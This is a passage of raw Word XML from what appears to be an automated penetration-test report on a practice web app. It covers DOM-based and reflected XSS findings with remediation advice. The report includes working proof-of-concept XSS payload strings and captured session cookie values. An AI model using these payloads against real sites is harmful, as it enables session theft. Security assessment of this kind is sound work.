            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08DE09B9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4927C3D1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId41">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A1 - Broken Access Control</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F4E5BD1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C253D17" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="410B9224" wp14:editId="73F23D3A">
            <wp:extent cx="5852160" cy="329184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5852160" cy="3291840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA55EDF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Figure 1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Local File Inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62353760" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9A37B7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D583926" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C95668E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.5 DOM-based Cross-Site Scripting </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="3DCCE336" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A8C4A40" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33094C0C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="06B73730" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F23C538" wp14:editId="0A51C572">
                  <wp:extent cx="1397000" cy="1397000"/>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3118342B" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78355FFC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="32B050CA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="089626D9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrayFirstColumn"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2066"/>
        <w:gridCol w:w="7783"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="012A5197"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035D026A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4642" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22325D19"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42">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/xss_d/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6F094478"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4F88C899" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4642" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D847F02"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5112A5A5"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51949A24" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Vulnerable Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4642" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CEA3C28" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>default</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>(Query Parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="2252FCE8"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53697FFC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4642" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="115FC69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Injected the payload </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>&lt;/option&gt;&lt;/select&gt;&lt;sVg/onLOad=document.body.append(`6f798b51`.repeat(2))&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>default query parameter</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and the expected result </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>6f798b516f798b51</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> was found in the response. The payload reached the JavaScript sink </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>document.write</w:t>
            </w:r>
            <w:r>
              <w:t>. The stack trace to this call was:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>anonymous @ https://pentest-ground.com:4280/vulnerabilities/xss_d/?default=defaultpttf291ab78`: line 70, column 15</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">The script inside the payload tries to repeat a random string. If the string </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>6f798b51</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> is doubled on the response page, we confirm that our script has been executed.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>This request was done using a Chrome browser.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">If available, the replay attack button uses a simpler </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>alert()</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> payload that may not work as expected.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>To validate the vulnerability, we attempted to extract some data exposed by the application in the browser.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">The application uses the following (non-HttpOnly) cookies: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>_ga:GA1.1.1244663522.1739354417_ga_Z3XCDXSJ3P:GS1.1.17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>39354416.1.1.1739354516.20.0.0_gcl_au:1.1.613626497.1739354416PHPSESSID:19d5a469db64624265da3f93925f7be3security:low</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId43">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64BD0687" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:p w14:paraId="42B0565D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EE0827" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We found that the target web application is vulnerable to DOM-based Cross-Site Scripting (DOM XSS) attacks. This vulnerability is caused by inadequate input validation, allowing a malicious actor to inject and execute JavaScript code in the context of another user's session. DOM-based XSS is purely client-side, meaning the malicious script runs as a result of modifying the Document Object Model (DOM) environment in the victim's browser, without sending the payload to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BB75E5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A68EBC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk is that the code injected by an attacker could potentially lead to effects such as stealing session cookies, calling application features on behalf of another user, or exploiting browser vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BEAA26" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E924433" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>There are several ways to mitigate DOM-based XSS attacks. We recommend to:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- never trust user input</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- encode and escape user input on the client side as well</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- implement Content Security Policy (CSP)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- use the HTTPOnly cookie flag to protect from cookie theft</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">- try to avoid using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
        </w:rPr>
        <w:t>document.write()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to insert untrusted content directly into your HTML, as these methods don't filter malicious scripts. Use methods that provide finer control, such as creating elements via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
        </w:rPr>
        <w:t>document.createElement()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and safely inserting values with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
        </w:rPr>
        <w:t>Element.textContent</w:t>
      </w:r>
      <w:r>
        <w:t>. If you must use unsafe methods, pass their inputs to an HTML sanitization library first, such as DOMPurify.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- regularly update and audit JavaScript libraries and frameworks for vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4F54E8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A793634" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId44">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/attacks/DOM_Based_XSS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67212E59" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId45">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7EFBF4C7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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665311D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2EA7E71" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19016A2D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="29BB7808" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BE16378" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30B1A2B3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId46">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CWE-79</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="2C2845CA" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17F89DEE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37CF70D4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId47">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A7 - Cross-Site Scripting (XSS)</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6400F557" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="200A28E2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40CF190E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId48">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A3 - Injection</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13D100D8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541A2A12" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACCD8F2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAB7EAC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.6 Cross-Site Scripting </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0BC71A9E" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2127869F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04643817" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="13C871EC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E10608E" wp14:editId="555525FD">
                  <wp:extent cx="1397000" cy="1397000"/>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70DDF8FF" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7054D57E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="018F4886" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EA630F2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrayFirstColumn"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2066"/>
        <w:gridCol w:w="7783"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4EA4700F"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18B07EEC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4642" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4601D064"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49">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/xss_r/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="3BFF2D35"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156BC03A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4642" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61BA1D34"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3BEE06D5"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47761183" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Vulnerable Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4642" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="178A9E77" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>name</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>(Query Parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="457C2E6D"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3588FDC9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4642" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="637CCAC7"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Injected the payload </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>&lt;sVg/onLOad=document.body.append(`0baf618c`.repeat(2))&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>name query parameter</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and the expected result </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>0baf618c0baf618c</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> was found in the response.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">The script inside the payload tries to repeat a random string. If the string </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>0baf618c</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> is doubled on the response page, we confirm that our script has been executed.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>This request was done using a Chrome browser.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">If available, the replay attack button uses a simpler </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>alert()</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> payload that may not work as expected.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>To validate the vulnerability, we attempted to extract some data exposed by the application in the browser.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">The application uses the following (non-HttpOnly) cookies: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>_ga:GA1.1.1244663522.1739354417_ga_Z3XCDXSJ3P:GS1.1.1739354416.1.1.1739354516.20.0.0_gcl_au:1.1.613626497.1739354416PHPSESSID:19d5a469db64624265da3f93925f7be3security:low</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId50">
